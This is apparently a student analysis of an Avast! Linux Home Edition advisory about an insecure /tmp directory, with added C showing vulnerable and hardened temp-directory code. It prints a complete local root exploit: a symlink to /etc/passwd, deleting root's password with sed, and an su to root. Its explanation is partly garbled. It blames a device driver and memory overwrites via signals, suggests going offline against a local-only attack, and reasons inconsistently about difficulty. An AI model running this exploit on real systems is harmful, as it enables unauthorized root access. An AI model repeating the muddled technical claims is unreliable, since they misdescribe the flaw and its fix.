Information Assurance

Clare M. Schramm




Bugtraq Analysis

Vulnerability on a Temporary Folder Creation in Avast! Linux Home Edition Product Link


Avast! Linux Home Edition is an anti-virus program for UNIX-like systems. This vulnerability is of particular interest because anti-virus software is supposed to prevent viruses, not make it easier for someone to get into your computer!

The vulnerability occurs when the program scans for a virus. A temporary directory is created under /tmp in an insecure manner: it is given a chmod of 1777 (the leading 1 is the sticky bit), which allows all users on the system to read, write, and execute it. This can create an entryway for local users to gain escalated privileges. Alternatively, local users can use the escalated privileges to cause a Denial of Service, which is very annoying for the root user.

In order to exploit this vulnerability, a malicious user (who must be locally logged in to the system) must create a symlink at /tmp/_avast4_ pointing to /etc/passwd. Here is a sample of how this is done:

$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1476 avr 14 15:30 /etc/passwd
$ ln -s /etc/passwd /tmp/_avast4_
$ ll /tmp/_avast4_
lrwxrwxrwx 1 user user 11 avr 14 16:43 /tmp/_avast4_ -> /etc/passwd
...
Waiting for user root to scan for virus (example: # avast -d /bin)
...
$ ls -l /etc/passwd
-rwxrwxrwt 1 root root 1476 avr 14 15:55 /etc/passwd (Oops!)
$ sed s/^root:x:/root::/ /etc/passwd > /tmp/a.out
$ cat /tmp/a.out > /etc/passwd
$ su -
# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Basically, this vulnerability is due to missing INPUT VALIDATION in the device driver. Thus, someone can overwrite arbitrary memory via signals with specially-created input! That is why it is SO important to CHECK YOUR INPUT!!!

How should Avast! fix this critical vulnerability? The user can begin by not connecting the machine to a local network, so that no other user is in a position to gain root privilege. But this is not always possible. Until a patch is developed which CHECKS FOR SYMLINKS or gives the temporary directory a MORE SECURE CHMOD, there's basically no protection for the user. However, this is an extremely difficult vulnerability for someone to take advantage of, considering that the "_avast4_" folder is not erased when the virus scan is finished. Also, the malicious user must act within a short period of time, because this distribution of software usually cleans the /tmp folder with the tmpwatch utility, which gets rid of all files older than a certain age.
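Here is an added example of my own (not avast's code) showing the two fixes just mentioned in C: the vulnerable pattern, a fixed name under /tmp chmod'ed to 1777 by path, next to a hardened version that checks for symlinks and never needs 1777 at all. The function names insecure_tmpdir, secure_tmpdir and is_symlink are hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (the one the advisory describes): a fixed, predictable
 * name under /tmp, then chmod() by path. chmod() follows symlinks, so if a
 * local user has pre-planted that name as a link to some other file, the
 * 1777 mode lands on the link's target instead of the scratch directory. */
int insecure_tmpdir(const char *path) {
    if (mkdir(path, 01777) != 0 && errno != EEXIST)
        return -1;              /* a planted link gives EEXIST and we carry on */
    return chmod(path, 01777);  /* follows the link: this is the bug */
}

/* Hardened pattern: mkdtemp() picks an unpredictable name and creates the
 * directory 0700 atomically (the sticky bit on /tmp stops other users from
 * swapping it out). We then open it with O_NOFOLLOW, verify through the
 * descriptor that it is a directory we own, and set the mode with fchmod(),
 * never by path. A scanner's private scratch space needs no 1777 at all. */
int secure_tmpdir(char *tmpl) {   /* tmpl: writable "/tmp/scan.XXXXXX" */
    if (mkdtemp(tmpl) == NULL)
        return -1;
    int fd = open(tmpl, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    int rc = fchmod(fd, 0700);
    close(fd);
    return rc;
}

/* The check the advisory asks for: is this path a symlink? lstat() does not
 * follow links. Returns 1 (link), 0 (not a link), -1 (missing or error). */
int is_symlink(const char *path) {
    struct stat st;
    if (lstat(path, &st) != 0)
        return -1;
    return S_ISLNK(st.st_mode) ? 1 : 0;
}
```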

MORAL OF THE STORY: PEOPLE ARE EVIL--BEWARE OF SYMLINKS!!! And always check for them when opening files to make your code secure!